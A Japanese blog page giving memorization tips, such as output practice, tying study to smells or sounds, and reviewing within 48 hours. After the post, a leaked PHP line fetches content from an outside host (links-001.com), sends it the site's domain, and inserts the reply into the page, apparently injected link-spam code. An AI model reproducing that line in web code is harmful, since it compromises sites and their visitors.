前へ
次へ

世界史に出てくる人名をどう暗記するか

社会の一つとして歴史があり、小学校や中学校でも学びます。
ただ中学校までに出てくる歴史の大半は

more

暗記アプリって何か、その内容も様々

スマートフォンのアプリには様々なアプリがあり、その中には暗記に特化したアプリもあります。
一般

more

アルファベットによる略称を暗記する

ヨーロッパ共同体の略と言えばECで比較的多くの人が知っているでしょう。
正式な日本名を知らなく

more

暗記が出来るように自分を導くのであれば

やはり暗記力を高めると言うのは、色々な勉強をする上では大前提となります。
結局のところ記憶力が高まれば、様々なことを覚えてすぐに活用できるようになるので、非常に便利ですし合理的です。
どのようにすれば記憶力を高めることができるのか、そこにターゲットを絞って真剣に考える時間も作っておきましょう。
むやみやたらにいろいろなものを反復で勉強し、勉強机にかじりつきっぱなしと言うのも、非常に疲れてしまいます。
もちろんそれでもある程度は覚えることができますが、それよりも効率的な覚え方というのが必ずあるはずです。
例えば英語などの語学を勉強する際には、教科書の中身を丸暗記するように意識しても、なかなか覚えることができないでしょう。
それよりも、覚えたものをしっかりとアウトプットするように意識することが大事です。
人間は、覚えたものをアウトプットすることで、そこで初めて脳に意識を定着させることができます。
その基本的な脳のメカニズムを理解しておくことが、大きなポイントになってくるでしょう。
さらに、1人で何の特徴もないところで黙々と勉強するよりは、誰かと一緒に勉強したり、何かしらのにおいや音がある所で勉強すると、それらの記憶と紐付いて、記憶を呼び覚ますきっかけにもなります。
いざと言う時にすぐに覚えたことが出てくるきっかけになるので、やはり何かしらの記憶と紐付けることも大事です。
なお、脳にさらに定着させるには、48時間以内に復習しなければならないといった事実もあるので、覚えておいた方が良いでしょう。
復習を怠らないようにしていれば、それだけでもかなりの確率でいろいろなものを忘れずに済むようになります。
暗記のプロフェッショナルは、そのノウハウ自体がいつもニーズがあるので、様々なコンテンツでそのノウハウを確認できるはずです。
雑誌からも勉強できますし、インターネット上の特定の無料動画サイトからでもノウハウを学ぶことができできたりするので、勉強材料として活用させてもらいましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top